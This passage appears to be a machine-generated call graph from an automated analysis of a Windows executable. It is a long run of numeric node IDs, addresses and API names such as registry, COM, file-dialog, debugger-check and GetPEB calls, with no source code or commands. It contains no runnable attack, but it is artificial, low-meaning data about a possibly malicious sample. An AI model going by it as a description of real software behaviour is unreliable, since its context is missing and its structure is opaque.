calls Mailbox 98718->98854 98855 6dd9e3 59 API calls 98718->98855 98856 6d6665 59 API calls 2 library calls 98718->98856 98857 688561 59 API calls 98718->98857 98719->98718 98725 6877c7 59 API calls 98719->98725 98719->98730 98731 6a0719 timeGetTime 98719->98731 98735 6c5fb9 GetExitCodeProcess 98719->98735 98737 68b93d 109 API calls 98719->98737 98742 7061ac 110 API calls 98719->98742 98743 6c5c9e 98719->98743 98744 6c54a2 Sleep 98719->98744 98745 6c6041 Sleep 98719->98745 98747 687f41 59 API calls 98719->98747 98858 6e28f7 60 API calls 98719->98858 98859 689fbd 60 API calls 98719->98859 98860 688b13 69 API calls Mailbox 98719->98860 98861 68b89c 341 API calls 98719->98861 98862 6d6a50 60 API calls 98719->98862 98863 6e54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98719->98863 98864 6e3e91 66 API calls Mailbox 98719->98864 98721->98718 98722->98730 98723->98719 98724->98718 98725->98719 98726->98719 98728->98718 98730->97446 98731->98719 98849 689fbd 60 API calls 98732->98849 98738 6c5fcf WaitForSingleObject 98735->98738 98739 6c5fe5 CloseHandle 98735->98739 98736->98718 98737->98719 98738->98718 98738->98739 98739->98719 98742->98719 98743->98730 98744->98718 98745->98718 98747->98719 98751->98718 98753->98718 98754->98718 98757->98718 98759->98718 98760->98718 98761->98718 98762->98718 98763->98718 98764->98718 98765->98718 98766->98718 98767->98718 98768->98718 98769->98718 98770->98718 98772 6bf1ca 98771->98772 98775 688452 98771->98775 98773 6bf1da 98772->98773 98879 6d671a 59 API calls 98772->98879 98776 68847c 98775->98776 98781 688499 Mailbox 98775->98781 98876 688720 59 API calls Mailbox 98775->98876 98778 688482 98776->98778 98878 688720 59 API calls Mailbox 98776->98878 98778->98781 98877 689df0 59 API calls Mailbox 98778->98877 98781->97460 98782->97464 98783->97464 98784->97460 98785->97401 98786->97405 98787->97410 98788->97405 98789->97405 98790->97414 98791->97427 98792->97422 98793->97422 98794->97425 98795->97429 98796->97464 98797->97464 98798->97464 98799->97405 98800->97455 98801->97405 98802->98685 98803->98692 98805 68e59d 98804->98805 98806 68e5b1 98804->98806 98865 68e060 341 API calls 2 library calls 98805->98865 98866 6ea0b5 89 API calls 4 library calls 98806->98866 98808 68e5a8 98808->98718 98810 6c3ece 98810->98810 98812 68e835 98811->98812 98813 6c3ed3 98812->98813 98815 68e89f 98812->98815 98825 68e8f9 98812->98825 98814 68a000 341 API calls 98813->98814 98816 6c3ee8 98814->98816 98818 6877c7 59 API calls 98815->98818 98815->98825 98836 68ead0 Mailbox 98816->98836 98868 6ea0b5 89 API calls 4 library calls 98816->98868 98817 6877c7 59 API calls 98817->98825 98820 6c3f2e 98818->98820 98822 6a2f80 __cinit 67 API calls 98820->98822 98821 6a2f80 __cinit 67 API calls 98821->98825 98822->98825 98823 6c3f50 98823->98718 98824 688620 69 API calls 98824->98836 98825->98817 98825->98821 98825->98823 98830 68eaba 98825->98830 98825->98836 98826 68a000 341 API calls 98826->98836 98827 68f2f5 98873 6ea0b5 89 API calls 4 library calls 98827->98873 98829 6ea0b5 89 API calls 98829->98836 98830->98836 98869 6ea0b5 89 API calls 4 library calls 98830->98869 98831 688ea0 59 API calls 98831->98836 98835 6c424f 98835->98718 98836->98824 98836->98826 98836->98827 98836->98829 98836->98831 98841 68ebd8 98836->98841 98867 6880d7 59 API calls 2 library calls 98836->98867 98870 6d7405 59 API calls 98836->98870 98871 6fc8d7 341 API calls 98836->98871 98872 6fb851 341 API calls Mailbox 98836->98872 98874 689df0 59 API calls Mailbox 98836->98874 98875 6f96db 341 API calls Mailbox 98836->98875 98841->98718 98843 683212 98842->98843 98846 6831e0 98842->98846 98843->98718 98844 683205 IsDialogMessageW 98844->98843 98844->98846 98845 6bd182 GetClassLongW 98845->98844 98845->98846 98846->98843 98846->98844 98846->98845 98847->98701 98848->98706 98849->98718 98850->98707 98851->98707 98852->98707 98853->98718 98854->98718 98855->98718 98856->98718 98857->98718 98858->98719 98859->98719 98860->98719 98861->98719 98862->98719 98863->98719 98864->98719 98865->98808 98866->98810 98867->98836 98868->98836 98869->98836 98870->98836 98871->98836 98872->98836 98873->98835 98874->98836 98875->98836 98876->98776 98877->98781 98878->98778 98879->98773 98880->97488 98881->97483 98882->97319 98883->97323 98884->97325 98885->97223 98887 6a2e90 __freefls@4 98886->98887 98894 6a3457 98887->98894 98893 6a2eb7 __freefls@4 98893->97230 98895 6a9e4b __lock 58 API calls 98894->98895 98896 6a2e99 98895->98896 98897 6a2ec8 DecodePointer DecodePointer 98896->98897 98898 6a2ea5 98897->98898 98899 6a2ef5 98897->98899 98908 6a2ec2 98898->98908 98899->98898 98911 6a89e4 59 API calls __vswprintf_l 98899->98911 98901 6a2f58 EncodePointer EncodePointer 98901->98898 98902 6a2f07 98902->98901 98904 6a2f2c 98902->98904 98912 6a8aa4 61 API calls 2 library calls 98902->98912 98904->98898 98906 6a2f46 EncodePointer 98904->98906 98913 6a8aa4 61 API calls 2 library calls 98904->98913 98906->98901 98907 6a2f40 98907->98898 98907->98906 98914 6a3460 98908->98914 98911->98902 98912->98904 98913->98907 98917 6a9fb5 LeaveCriticalSection 98914->98917 98916 6a2ec7 98916->98893 98917->98916 98919 688e3c Mailbox 98918->98919 98920 6892c0 Mailbox 59 API calls 98919->98920 98921 688e47 98919->98921 98920->98921 98921->97248 98922->97248 98923->97252 98924 68e70b 98925 68d260 341 API calls 98924->98925 98926 68e719 98925->98926 98927 68107d 98932 6871eb 98927->98932 98929 68108c 98930 6a2f80 __cinit 67 API calls 98929->98930 98931 681096 98930->98931 98933 6871fb __write_nolock 98932->98933 98934 6877c7 59 API calls 98933->98934 98935 6872b1 98934->98935 98963 684864 98935->98963 98937 6872ba 98970 6a074f 98937->98970 98940 687e0b 59 API calls 98941 6872d3 98940->98941 98976 683f84 98941->98976 98944 6877c7 59 API calls 98945 6872eb 98944->98945 98946 687eec 59 API calls 98945->98946 98947 6872f4 RegOpenKeyExW 98946->98947 98948 6becda RegQueryValueExW 98947->98948 98952 687316 Mailbox 98947->98952 98949 6bed6c RegCloseKey 98948->98949 98950 6becf7 98948->98950 98949->98952 98961 6bed7e _wcscat Mailbox __wsetenvp 98949->98961 98951 6a0ff6 Mailbox 59 API calls 98950->98951 98953 6bed10 98951->98953 98952->98929 98954 68538e 59 API calls 98953->98954 98955 6bed1b RegQueryValueExW 98954->98955 98956 6bed38 98955->98956 98958 6bed52 98955->98958 98957 687d2c 59 API calls 98956->98957 98957->98958 98958->98949 98959 687f41 59 API calls 98959->98961 98960 683f84 59 API calls 98960->98961 98961->98952 98961->98959 98961->98960 98962 687b52 59 API calls 98961->98962 98962->98961 98982 6b1b90 98963->98982 98966 687f41 59 API calls 98967 684897 98966->98967 98984 6848ae 98967->98984 98969 6848a1 Mailbox 98969->98937 98971 6b1b90 __write_nolock 98970->98971 98972 6a075c GetFullPathNameW 98971->98972 98973 6a077e 98972->98973 98974 687d2c 59 API calls 98973->98974 98975 6872c5 98974->98975 98975->98940 98977 683f92 98976->98977 98981 683fb4 _memmove 98976->98981 98979 6a0ff6 Mailbox 59 API calls 98977->98979 98978 6a0ff6 Mailbox 59 API calls 98980 683fc8 98978->98980 98979->98981 98980->98944 98981->98978 98983 684871 GetModuleFileNameW 98982->98983 98983->98966 98985 6b1b90 __write_nolock 98984->98985 98986 6848bb GetFullPathNameW 98985->98986 98987 6848da 98986->98987 98988 6848f7 98986->98988 98989 687d2c 59 API calls 98987->98989 98990 687eec 59 API calls 98988->98990 98991 6848e6 98989->98991 98990->98991 98994 687886 98991->98994 98995 687894 98994->98995 98996 687e8c 59 API calls 98995->98996 98997 6848f2 98996->98997 98997->98969 98998 6c4599 99002 6d655c 98998->99002 99000 6c45a4 99001 6d655c 85 API calls 99000->99001 99001->99000 99003 6d6596 99002->99003 99008 6d6569 99002->99008 99003->99000 99004 6d6598 99014 689488 84 API calls Mailbox 99004->99014 99006 6d659d 99007 689997 84 API calls 99006->99007 99009 6d65a4 99007->99009 99008->99003 99008->99004 99008->99006 99011 6d6590 99008->99011 99010 687c8e 59 API calls 99009->99010 99010->99003 99013 689700 59 API calls _wcsstr 99011->99013 99013->99003 99014->99006 99015 36823b0 99029 3680000 99015->99029 99017 368247d 99032 36822a0 99017->99032 99035 36834a0 GetPEB 99029->99035 99031 368068b 99031->99017 99033 36822a9 Sleep 99032->99033 99034 36822b7 99033->99034 99036 36834ca 99035->99036 99036->99031 99037 6a7e93 99038 6a7e9f __freefls@4 99037->99038 99074 6aa048 GetStartupInfoW 99038->99074 99040 6a7ea4 99076 6a8dbc GetProcessHeap 99040->99076 99042 6a7efc 99043 6a7f07 99042->99043 99159 6a7fe3 58 API calls 3 library calls 99042->99159 99077 6a9d26 99043->99077 99046 6a7f0d 99047 6a7f18 __RTC_Initialize 99046->99047 99160 6a7fe3 58 API calls 3 library calls 99046->99160 99098 6ad812 99047->99098 99050 6a7f27 99051 6a7f33 GetCommandLineW 99050->99051 99161 6a7fe3 58 API calls 3 library calls 99050->99161 99117 6b5173 GetEnvironmentStringsW 99051->99117 99054 6a7f32 99054->99051 99057 6a7f4d 99058 6a7f58 99057->99058 99162 6a32f5 58 API calls 3 library calls 99057->99162 99127 6b4fa8 99058->99127 99061 6a7f5e 99062 6a7f69 99061->99062 99163 6a32f5 58 API calls 3 library calls 99061->99163 99141 6a332f 99062->99141 99065 6a7f71 99066 6a7f7c __wwincmdln 99065->99066 99164 6a32f5 58 API calls 3 library calls 99065->99164 99147 68492e 99066->99147 99069 6a7f90 99070 6a7f9f 99069->99070 99165 6a3598 58 API calls _doexit 99069->99165 99166 6a3320 58 API calls _doexit 99070->99166 99073 6a7fa4 __freefls@4 99075 6aa05e 99074->99075 99075->99040 99076->99042 99167 6a33c7 36 API calls 2 library calls 99077->99167 99079 6a9d2b 99168 6a9f7c InitializeCriticalSectionAndSpinCount __mtinitlocknum 99079->99168 99081 6a9d30 99082 6a9d34 99081->99082 99170 6a9fca TlsAlloc 99081->99170 99169 6a9d9c 61 API calls 2 library calls 99082->99169 99085 6a9d46 99085->99082 99087 6a9d51 99085->99087 99086 6a9d39 99086->99046 99171 6a8a15 99087->99171 99090 6a9d93 99179 6a9d9c 61 API calls 2 library calls 99090->99179 99093 6a9d72 99093->99090 99095 6a9d78 99093->99095 99094 6a9d98 99094->99046 99178 6a9c73 58 API calls 4 library calls 99095->99178 99097 6a9d80 GetCurrentThreadId 99097->99046 99099 6ad81e __freefls@4 99098->99099 99100 6a9e4b __lock 58 API calls 99099->99100 99101 6ad825 99100->99101 99102 6a8a15 __calloc_crt 58 API calls 99101->99102 99103 6ad836 99102->99103 99104 6ad8a1 GetStartupInfoW 99103->99104 99107 6ad841 @_EH4_CallFilterFunc@8 __freefls@4 99103->99107 99105 6ad8b6 99104->99105 99106 6ad9e5 99104->99106 99105->99106 99110 6a8a15 __calloc_crt 58 API calls 99105->99110 99113 6ad904 99105->99113 99108 6adaad 99106->99108 99111 6ada32 GetStdHandle 99106->99111 99112 6ada45 GetFileType 99106->99112 99192 6aa06b InitializeCriticalSectionAndSpinCount 99106->99192 99107->99050 99193 6adabd LeaveCriticalSection _doexit 99108->99193 99110->99105 99111->99106 99112->99106 99113->99106 99114 6ad938 GetFileType 99113->99114 99191 6aa06b InitializeCriticalSectionAndSpinCount 99113->99191 99114->99113 99118 6a7f43 99117->99118 99119 6b5184 99117->99119 99123 6b4d6b GetModuleFileNameW 99118->99123 99194 6a8a5d 58 API calls 2 library calls 99119->99194 99121 6b51aa _memmove 99122 6b51c0 FreeEnvironmentStringsW 99121->99122 99122->99118 99124 6b4d9f _wparse_cmdline 99123->99124 99126 6b4ddf _wparse_cmdline 99124->99126 99195 6a8a5d 58 API calls 2 library calls 99124->99195 99126->99057 99128 6b4fc1 __wsetenvp 99127->99128 99132 6b4fb9 99127->99132 99129 6a8a15 __calloc_crt 58 API calls 99128->99129 99134 6b4fea __wsetenvp 99129->99134 99130 6b5041 99131 6a2f95 _free 58 API calls 99130->99131 99131->99132 99132->99061 99133 6a8a15 __calloc_crt 58 API calls 99133->99134 99134->99130 99134->99132 99134->99133 99135 6b5066 99134->99135 99138 6b507d 99134->99138 99196 6b4857 58 API calls __vswprintf_l 99134->99196 99137 6a2f95 _free 58 API calls 99135->99137 99137->99132 99197 6a9006 IsProcessorFeaturePresent 99138->99197 99140 6b5089 99140->99061 99143 6a333b __IsNonwritableInCurrentImage 99141->99143 99220 6aa711 99143->99220 99144 6a3359 __initterm_e 99145 6a2f80 __cinit 67 API calls 99144->99145 99146 6a3378 _doexit __IsNonwritableInCurrentImage 99144->99146 99145->99146 99146->99065 99148 684948 99147->99148 99158 6849e7 99147->99158 99149 684982 IsThemeActive 99148->99149 99223 6a35ac 99149->99223 99153 6849ae 99235 684a5b SystemParametersInfoW SystemParametersInfoW 99153->99235 99155 6849ba 99236 683b4c 99155->99236 99157 6849c2 SystemParametersInfoW 99157->99158 99158->99069 99159->99043 99160->99047 99161->99054 99165->99070 99166->99073 99167->99079 99168->99081 99169->99086 99170->99085 99173 6a8a1c 99171->99173 99174 6a8a57 99173->99174 99176 6a8a3a 99173->99176 99180 6b5446 99173->99180 99174->99090 99177 6aa026 TlsSetValue 99174->99177 99176->99173 99176->99174 99188 6aa372 Sleep 99176->99188 99177->99093 99178->99097 99179->99094 99181 6b5451 99180->99181 99187 6b546c 99180->99187 99182 6b545d 99181->99182 99181->99187 99189 6a8d68 58 API calls __getptd_noexit 99182->99189 99184 6b547c HeapAlloc 99185 6b5462 99184->99185 99184->99187 99185->99173 99187->99184 99187->99185 99190 6a35e1 DecodePointer 99187->99190 99188->99176 99189->99185 99190->99187 99191->99113 99192->99106 99193->99107 99194->99121 99195->99126 99196->99134 99198 6a9011 99197->99198 99203 6a8e99 99198->99203 99202 6a902c 99202->99140 99204 6a8eb3 _memset ___raise_securityfailure 99203->99204 99205 6a8ed3 IsDebuggerPresent 99204->99205 99211 6aa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99205->99211 99208 6a8fba 99210 6aa380 GetCurrentProcess TerminateProcess 99208->99210 99209 6a8f97 ___raise_securityfailure 99212 6ac836 99209->99212 99210->99202 99211->99209 99213 6ac83e 99212->99213 99214 6ac840 IsProcessorFeaturePresent 99212->99214 99213->99208 99216 6b5b5a 99214->99216 99219 6b5b09 5 API calls ___raise_securityfailure 99216->99219 99218 6b5c3d 99218->99208 99219->99218 99221 6aa714 EncodePointer 99220->99221 99221->99221 99222 6aa72e 99221->99222 99222->99144 99224 6a9e4b __lock 58 API calls 99223->99224 99225 6a35b7 DecodePointer EncodePointer 99224->99225 99288 6a9fb5 LeaveCriticalSection 99225->99288 99227 6849a7 99228 6a3614 99227->99228 99229 6a3638 99228->99229 99230 6a361e 99228->99230 99229->99153 99230->99229 99289 6a8d68 58 API calls __getptd_noexit 99230->99289 99232 6a3628 99290 6a8ff6 9 API calls __vswprintf_l 99232->99290 99234 6a3633 99234->99153 99235->99155 99237 683b59 __write_nolock 99236->99237 99238 6877c7 59 API calls 99237->99238 99239 683b63 GetCurrentDirectoryW 99238->99239 99291 683778 99239->99291 99241 683b8c IsDebuggerPresent 99242 683b9a 99241->99242 99243 6bd4ad MessageBoxA 99241->99243 99245 6bd4c7 99242->99245 99246 683bb7 99242->99246 99274 683c73 99242->99274 99243->99245 99244 683c7a SetCurrentDirectoryW 99249 683c87 Mailbox 99244->99249 99424 687373 59 API calls Mailbox 99245->99424 99372 6873e5 99246->99372 99249->99157 99250 6bd4d7 99255 6bd4ed SetCurrentDirectoryW 99250->99255 99255->99249 99274->99244 99288->99227 99289->99232 99290->99234 99292 6877c7 59 API calls 99291->99292 99293 68378e 99292->99293 99426 683d43 99293->99426 99295 6837ac 99296 684864 61 API calls 99295->99296 99297 6837c0 99296->99297 99298 687f41 59 API calls 99297->99298 99299 6837cd 99298->99299 99300 684f3d 136 API calls 99299->99300 99301 6837e6 99300->99301 99302 6bd3ae 99301->99302 99303 6837ee Mailbox 99301->99303 99465 6e97e5 99302->99465 99307 6881a7 59 API calls 99303->99307 99306 6bd3cd 99309 6a2f95 _free 58 API calls 99306->99309 99310 683801 99307->99310 99308 684faa 84 API calls 99308->99306 99311 6bd3da 99309->99311 99312 6893ea 59 API calls 99310->99312 99314 684faa 84 API calls 99311->99314 99313 68380d 99312->99313 99316 687f41 59 API calls 99313->99316 99315 6bd3e3 99314->99315 99319 683ee2 59 API calls 99315->99319 99317 68381a 99316->99317 99318 688620 69 API calls 99317->99318 99320 68382c Mailbox 99318->99320 99321 6bd3fe 99319->99321 99322 687f41 59 API calls 99320->99322 99323 683ee2 59 API calls 99321->99323 99324 683852 99322->99324 99325 6bd41a 99323->99325 99326 688620 69 API calls 99324->99326 99328 684864 61 API calls 99325->99328 99327 683861 Mailbox 99326->99327 99332 6877c7 59 API calls 99327->99332 99329 6bd43f 99328->99329 99330 683ee2 59 API calls 99329->99330 99331 6bd44b 99330->99331 99334 6881a7 59 API calls 99331->99334 99333 68387f 99332->99333 99440 683ee2 99333->99440 99335 6bd459 99334->99335 99337 683ee2 59 API calls 99335->99337 99339 6bd468 99337->99339 99345 6881a7 59 API calls 99339->99345 99341 683899 99341->99315 99342 6838a3 99341->99342 99343 6a313d _W_store_winword 60 API calls 99342->99343 99344 6838ae 99343->99344 99344->99321 99346 6838b8 99344->99346 99347 6bd48a 99345->99347 99348 6a313d _W_store_winword 60 API calls 99346->99348 99349 683ee2 59 API calls 99347->99349 99350 6838c3 99348->99350 99351 6bd497 99349->99351 99350->99325 99352 6838cd 99350->99352 99351->99351 99353 6a313d _W_store_winword 60 API calls 99352->99353 99354 6838d8 99353->99354 99354->99339 99355 683919 99354->99355 99357 683ee2 59 API calls 99354->99357 99355->99339 99356 683926 99355->99356 99359 68942e 59 API calls 99356->99359 99358 6838fc 99357->99358 99360 6881a7 59 API calls 99358->99360 99361 683936 99359->99361 99362 68390a 99360->99362 99363 6891b0 59 API calls 99361->99363 99364 683ee2 59 API calls 99362->99364 99365 683944 99363->99365 99364->99355 99456 689040 99365->99456 99367 6893ea 59 API calls 99369 683961 99367->99369 99368 689040 60 API calls 99368->99369 99369->99367 99369->99368 99370 683ee2 59 API calls 99369->99370 99371 6839a7 Mailbox 99369->99371 99370->99369 99371->99241 99373 6873f2 __write_nolock 99372->99373 99374 68740b 99373->99374 99376 6bee4b _memset 99373->99376 99375 6848ae 60 API calls 99374->99375 99378 687414 99375->99378 99377 6bee67 GetOpenFileNameW 99376->99377 99379 6beeb6 99377->99379 99504 6a09d5 99378->99504 99381 687d2c 59 API calls 99379->99381 99383 6beecb 99381->99383 99383->99383 99385 687429 99522 6869ca 99385->99522 99424->99250 99427 683d50 __write_nolock 99426->99427 99428 687d2c 59 API calls 99427->99428 99434 683eb6 Mailbox 99427->99434 99430 683d82 99428->99430 99429 687b52 59 API calls 99429->99430 99430->99429 99437 683db8 Mailbox 99430->99437 99431 687b52 59 API calls 99431->99437 99432 683e89 99433 687f41 59 API calls 99432->99433 99432->99434 99436 683eaa 99433->99436 99434->99295 99435 687f41 59 API calls 99435->99437 99438 683f84 59 API calls 99436->99438 99437->99431 99437->99432 99437->99434 99437->99435 99439 683f84 59 API calls 99437->99439 99438->99434 99439->99437 99441 683eec 99440->99441 99442 683f05 99440->99442 99444 6881a7 59 API calls 99441->99444 99443 687d2c 59 API calls 99442->99443 99445 68388b 99443->99445 99444->99445 99446 6a313d 99445->99446 99447 6a3149 99446->99447 99448 6a31be 99446->99448 99455 6a316e 99447->99455 99500 6a8d68 58 API calls __getptd_noexit 99447->99500 99502 6a31d0 60 API calls 3 library calls 99448->99502 99451 6a31cb 99451->99341 99452 6a3155 99501 6a8ff6 9 API calls __vswprintf_l 99452->99501 99454 6a3160 99454->99341 99455->99341 99457 6bf5a5 99456->99457 99460 689057 99456->99460 99457->99460 99503 688d3b 59 API calls Mailbox 99457->99503 99459 68915f 99459->99369 99460->99459 99461 689158 99460->99461 99462 6891a0 99460->99462 99464 6a0ff6 Mailbox 59 API calls 99461->99464 99463 689e9c 60 API calls 99462->99463 99463->99459 99464->99459 99466 685045 85 API calls 99465->99466 99467 6e9854 99466->99467 99468 6e99be 96 API calls 99467->99468 99469 6e9866 99468->99469 99470 68506b 74 API calls 99469->99470 99499 6bd3c1 99469->99499 99471 6e9881 99470->99471 99472 68506b 74 API calls 99471->99472 99473 6e9891 99472->99473 99474 68506b 74 API calls 99473->99474 99475 6e98ac 99474->99475 99476 68506b 74 API calls 99475->99476 99477 6e98c7 99476->99477 99478 685045 85 API calls 99477->99478 99479 6e98de 99478->99479 99480 6a594c std::exception::_Copy_str 58 API calls 99479->99480 99481 6e98e5 99480->99481 99482 6a594c std::exception::_Copy_str 58 API calls 99481->99482 99483 6e98ef 99482->99483 99484 68506b 74 API calls 99483->99484 99485 6e9903 99484->99485 99486 6e9393 GetSystemTimeAsFileTime 99485->99486 99487 6e9916 99486->99487 99488 6e992b 99487->99488 99489 6e9940 99487->99489 99492 6a2f95 _free 58 API calls 99488->99492 99490 6e9946 99489->99490 99491 6e99a5 99489->99491 99493 6e8d90 116 API calls 99490->99493 99494 6a2f95 _free 58 API calls 99491->99494 99495 6e9931 99492->99495 99496 6e999d 99493->99496 99494->99499 99497 6a2f95 _free 58 API calls 99495->99497 99498 6a2f95 _free 58 API calls 99496->99498 99497->99499 99498->99499 99499->99306 99499->99308 99500->99452 99501->99454 99502->99451 99503->99460 99505 6b1b90 __write_nolock 99504->99505 99506 6a09e2 GetLongPathNameW 99505->99506 99507 687d2c 59 API calls 99506->99507 99508 68741d 99507->99508 99509 68716b 99508->99509 99510 6877c7 59 API calls 99509->99510 99511 68717d 99510->99511 99512 6848ae 60 API calls 99511->99512 99513 687188 99512->99513 99514 6becae 99513->99514 99515 687193 99513->99515 99521 6becc8 99514->99521 99562 687a68 61 API calls 99514->99562 99516 683f84 59 API calls 99515->99516 99518 68719f 99516->99518 99556 6834c2 99518->99556 99520 6871b2 Mailbox 99520->99385 99523 684f3d 136 API calls 99522->99523 99524 6869ef 99523->99524 99525 6be45a 99524->99525 99527 684f3d 136 API calls 99524->99527 99526 6e97e5 122 API calls 99525->99526 99528 6be46f 99526->99528 99529 686a03 99527->99529 99530 6be473 99528->99530 99531 6be490 99528->99531 99529->99525 99532 686a0b 99529->99532 99533 684faa 84 API calls 99530->99533 99534 6a0ff6 Mailbox 59 API calls 99531->99534 99535 6be47b 99532->99535 99536 686a17 99532->99536 99533->99535 99545 6be4d5 Mailbox 99534->99545 99669 6e4534 90 API calls _wprintf 99535->99669 99563 686bec 99536->99563 99539 6be489 99539->99531 99541 6be689 99542 6a2f95 _free 58 API calls 99541->99542 99543 6be691 99542->99543 99544 684faa 84 API calls 99543->99544 99547 6be69a 99544->99547 99545->99541 99545->99547 99553 687f41 59 API calls 99545->99553 99655 68766f 99545->99655 99663 6874bd 99545->99663 99670 6dfc4d 59 API calls 2 library calls 99545->99670 99671 6dfb6e 61 API calls 2 library calls 99545->99671 99672 6e7621 59 API calls Mailbox 99545->99672 99550 6a2f95 _free 58 API calls 99547->99550 99552 684faa 84 API calls 99547->99552 99673 6dfcb1 89 API calls 4 library calls 99547->99673 99550->99547 99552->99547 99553->99545 99557 6834d4 99556->99557 99561 6834f3 _memmove 99556->99561 99559 6a0ff6 Mailbox 59 API calls 99557->99559 99558 6a0ff6 Mailbox 59 API calls 99560 68350a 99558->99560 99559->99561 99560->99520 99561->99558 99562->99514 99564 6be847 99563->99564 99565 686c15 99563->99565 99695 6dfcb1 89 API calls 4 library calls 99564->99695 99679 685906 60 API calls Mailbox 99565->99679 99568 6be85a 99696 6dfcb1 89 API calls 4 library calls 99568->99696 99569 686c37 99680 685956 67 API calls 99569->99680 99571 686c4c 99571->99568 99573 686c54 99571->99573 99574 6877c7 59 API calls 99573->99574 99576 686c60 99574->99576 99575 6be876 99578 686cc1 99575->99578 99681 6a0b9b 60 API calls __write_nolock 99576->99681 99580 6be889 99578->99580 99581 686ccf 99578->99581 99579 686c6c 99582 6877c7 59 API calls 99579->99582 99583 685dcf CloseHandle 99580->99583 99584 6877c7 59 API calls 99581->99584 99585 686c78 99582->99585 99586 6be895 99583->99586 99587 686cd8 99584->99587 99588 6848ae 60 API calls 99585->99588 99589 684f3d 136 API calls 99586->99589 99590 6877c7 59 API calls 99587->99590 99592 686c86 99588->99592 99593 6be8b1 99589->99593 99591 686ce1 99590->99591 99594 6846f9 59 API calls 99591->99594 99682 6859b0 ReadFile SetFilePointerEx 99592->99682 99596 6be8da 99593->99596 99600 6e97e5 122 API calls 99593->99600 99597 686cf8 99594->99597 99697 6dfcb1 89 API calls 4 library calls 99596->99697 99602 687c8e 59 API calls 99597->99602 99599 686cb2 99683 685c4e SetFilePointerEx SetFilePointerEx 99599->99683 99601 6be8cd 99600->99601 99604 6be8f6 99601->99604 99605 6be8d5 99601->99605 99606 686d09 SetCurrentDirectoryW 99602->99606 99608 684faa 84 API calls 99604->99608 99607 684faa 84 API calls 99605->99607 99611 686d1c Mailbox 99606->99611 99607->99596 99609 6be8fb 99608->99609 99610 6a0ff6 Mailbox 59 API calls 99609->99610 99613 6a0ff6 Mailbox 59 API calls 99611->99613 99624 686e6c Mailbox 99674 685934 99624->99674 99654 6be8f1 99654->99624 99656 68770f 99655->99656 99659 687682 _memmove 99655->99659 99658 6a0ff6 Mailbox 59 API calls 99656->99658 99657 6a0ff6 Mailbox 59 API calls 99660 687689 99657->99660 99658->99659 99659->99657 99661 6a0ff6 Mailbox 59 API calls 99660->99661 99662 6876b2 99660->99662 99661->99662 99662->99545 99664 6874d0 99663->99664 99666 68757e 99663->99666 99665 6a0ff6 Mailbox 59 API calls 99664->99665 99668 687502 99664->99668 99665->99668 99666->99545 99667 6a0ff6 59 API calls Mailbox 99667->99668 99668->99666 99668->99667 99669->99539 99670->99545 99671->99545 99672->99545 99673->99547 99675 685dcf CloseHandle 99674->99675 99679->99569 99680->99571 99681->99579 99682->99599 99683->99578 99695->99568 99696->99575 99697->99654 99756 6c0226 99763 68ade2 Mailbox 99756->99763 99757 68b6c1 99833 6ea0b5 89 API calls 4 library calls 99757->99833 99759 6c0c86 99834 6d66f4 59 API calls Mailbox 99759->99834 99761 6c0c8f 99763->99757 99763->99759 99763->99761 99764 6c00e0 VariantClear 99763->99764 99768 6fe237 99763->99768 99771 6f83a8 99763->99771 99831 689df0 59 API calls Mailbox 99763->99831 99832 6d7405 59 API calls 99763->99832 99764->99763 99769 6fcdf1 130 API calls 99768->99769 99770 6fe247 99769->99770 99770->99763 99835 689a20 99771->99835 99773 6f83ca CoInitialize 99774 6f83e9 VariantInit 99773->99774 99775 6f83e3 CoUninitialize 99773->99775 99776 6f8605 99774->99776 99777 6f8411 99774->99777 99775->99774 99780 6a0ff6 Mailbox 59 API calls 99776->99780 99778 6f8418 99777->99778 99779 6f85e4 99777->99779 99782 6f841b 99778->99782 99783 6f8487 99778->99783 99781 689997 84 API calls 99779->99781 99784 6f8616 99780->99784 99785 6f85f1 99781->99785 99786 6f86ba VariantClear 99782->99786 99787 6f8422 99782->99787 99791 6f849e 99783->99791 99792 6f859d 99783->99792 99790 689997 84 API calls 99784->99790 99800 6f8639 99784->99800 99788 689997 84 API calls 99785->99788 99786->99763 99789 689997 84 API calls 99787->99789 99788->99776 99793 6f842f 99789->99793 99794 6f8629 99790->99794 99849 689c9c 59 API calls 99791->99849 99799 689997 84 API calls 99792->99799 99798 689997 84 API calls 99793->99798 99837 6dda5d 99794->99837 99802 6f8445 99798->99802 99803 6f85a2 99799->99803 99826 6f855b 99800->99826 99854 6e7804 105 API calls Mailbox 99800->99854 99801 6f84a3 99804 6f84c7 99801->99804 99850 689c9c 59 API calls 99801->99850 99805 689997 84 API calls 99802->99805 99806 689997 84 API calls 99803->99806 99811 6a0ff6 Mailbox 59 API calls 99804->99811 99808 6f8457 99805->99808 99809 6f85b4 99806->99809 99813 689997 84 API calls 99808->99813 99810 689997 84 API calls 99809->99810 99814 6f85c8 99810->99814 99823 6f84ed 99811->99823 99812 6f84b8 99812->99804 99851 689c9c 59 API calls 99812->99851 99816 6f846b 99813->99816 99853 6f9a72 358 API calls 3 library calls 99814->99853 99848 6f9a72 358 API calls 3 library calls 99816->99848 99819 6f8538 99819->99826 99852 6e7804 105 API calls Mailbox 99819->99852 99821 6f8482 99821->99786 99822 6f85df 99822->99826 99823->99819 99825 6f8509 99823->99825 99827 689997 84 API calls 99823->99827 99828 689997 84 API calls 99825->99828 99826->99786 99855 6f96db 341 API calls Mailbox 99826->99855 99827->99825 99829 6f8525 99828->99829 99830 6dda5d 14 API calls 99829->99830 99830->99819 99831->99763 99832->99763 99833->99759 99834->99761 99836 689a2b 99835->99836 99836->99773 99856 6ddc20 99837->99856 99840 6ddab1 CoCreateInstance 99841 6ddacf 99840->99841 99842 6ddaee 99840->99842 99841->99800 99842->99841 99843 6ddaf9 SetErrorMode GetProcAddress 99842->99843 99844 6ddb18 99843->99844 99847 6ddb1f 99843->99847 99861 6ddd22 GetModuleFileNameW LoadTypeLibEx RegisterTypeLib RegisterTypeLibForUser 99844->99861 99845 6ddb8d SetErrorMode 99845->99841 99847->99845 99848->99821 99849->99801 99850->99812 99851->99804 99852->99826 99853->99822 99854->99826 99855->99786 99862 6d7652 99856->99862 99859 6ddaa9 99859->99840 99859->99841 99860 6ddc50 IIDFromString 99860->99859 99861->99847 99863 6d766d CLSIDFromProgID 99862->99863 99864 6d7667 99862->99864 99865 6d767b 99863->99865 99866 6d76b0 CLSIDFromString 99863->99866 99864->99863 99867 6d76bc 99865->99867 99868 6d767f ProgIDFromCLSID 99865->99868 99866->99867 99867->99859 99867->99860 99868->99867 99869 6d7694 